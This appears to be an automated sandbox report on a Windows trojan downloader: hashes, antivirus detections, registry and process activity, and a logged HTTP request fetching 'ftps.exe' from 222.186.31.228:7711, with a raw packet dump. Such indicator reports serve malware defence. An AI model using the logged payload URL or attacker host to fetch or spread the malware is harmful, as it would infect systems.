Analysis Date: 2015-11-13 22:26:08
MD5: 89d5293293970727d6445f604d899aa5
SHA1: 7ec17f1281818c705183b26d0c220959368d050f

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 747702b1c47291c58c36409acb147418 sha1: 287e6ebfe7ad455c7434dc2ff542bb3c6f8fc192 size: 16384
Section .rdata: md5: 8058945559eece3fed6be608c5c4c97a sha1: 98168edd56088d519ffbf8ca2ff45404ee5f3e00 size: 4096
Section .data: md5: 3f1e834be196e18211acbf67ae9bf362 sha1: e968b523398c8c1dc02d02371dff2ad68d28c6e4 size: 4096
Section PEinject: md5: e703eb75535d154ea6d3a32d7abc5720 sha1: b1a261e02a0cee08902e833ae3305ec967d13035 size: 12288
Timestamp: 1970-01-01 08:30:06
Packer: PE Diminisher V0.1 -> Teraphy
PEhash: ec7b416f32ee73bd9fd62ab91201e5abc1fb799b
IMPhash: 87bed5a7cba00c7e1f4015f1bdae2183
AV Rising: Error Scanning File
AV Mcafee: no_virus
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV Twister: Backdoor.0010@1F0050/C38.mg
AV Ad-Aware: Generic.ServStart.A9AC5463
AV Alwil (avast): GenMalicious-NEL [Trj]
AV Eset (nod32): Win32/TrojanDownloader.PESticker.A
AV Grisoft (avg): Win32/DH{I05X?}
AV Symantec: Downloader
AV Fortinet: W32/Injepe.A!tr.dldr
AV BitDefender: Generic.ServStart.A9AC5463
AV K7: Trojan-Downloader ( 00489a801 )
AV Microsoft Security Essentials: Backdoor:Win32/Farfli.BY
AV MicroWorld (escan): Generic.ServStart.A9AC5463
AV MalwareBytes: Trojan.Clicker.ED
AV Authentium: W32/Agent.SP.gen!Eldorado
AV Frisk (f-prot): W32/Agent.SP.gen!Eldorado
AV Ikarus: Trojan.Win32.Vehidis
AV Emsisoft: Generic.ServStart.A9AC5463
AV Zillya!: no_virus
AV Kaspersky: Trojan-Downloader.Win32.Injepe.a
AV Trend Micro: WORM_NITOL.SMB0
AV CAT (quickheal): Downloader.Injepe.08688
AV VirusBlokAda (vba32): BScope.Trojan.Agent
AV Padvish: no_virus
AV BullGuard: Generic.ServStart.A9AC5463
AV Arcabit (arcavir): Generic.ServStart.A9AC5463
AV ClamAV: Win.Trojan.Agent-738172
AV Dr. Web: Trojan.DownLoader11.13956
AV F-Secure: Generic.ServStart.A9AC5463
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: c:\windows\system32\thundet.exe
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: 222.186.31.228

Process
↳ c:\windows\system32\thundet.exe

Network Details:

DNS: shenhaozhe.com
Type: A
8.8.8.8
DNS: shenjianqiang.com
Type: A
HTTP GET: http://222.186.31.228:7711/ftps.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 222.186.31.228:7711

Raw Pcap
0x00000000 (00000)   47455420 2f667470 732e6578 65204854   GET /ftps.exe HT
0x00000010 (00016)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000020 (00032)   2a2f2a0d 0a416363 6570742d 456e636f   */*..Accept-Enco
0x00000030 (00048)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000040 (00064)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000050 (00080)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000060 (00096)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000070 (00112)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000080 (00128)   2e313b20 5356313b 202e4e45 5420434c   .1; SV1; .NET CL
0x00000090 (00144)   5220322e 302e3530 37323729 0d0a486f   R 2.0.50727)..Ho
0x000000a0 (00160)   73743a20 3232322e 3138362e 33312e32   st: 222.186.31.2
0x000000b0 (00176)   32383a37 3731310d 0a436f6e 6e656374   28:7711..Connect
0x000000c0 (00192)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x000000d0 (00208)   0a0d0a                                ...

Strings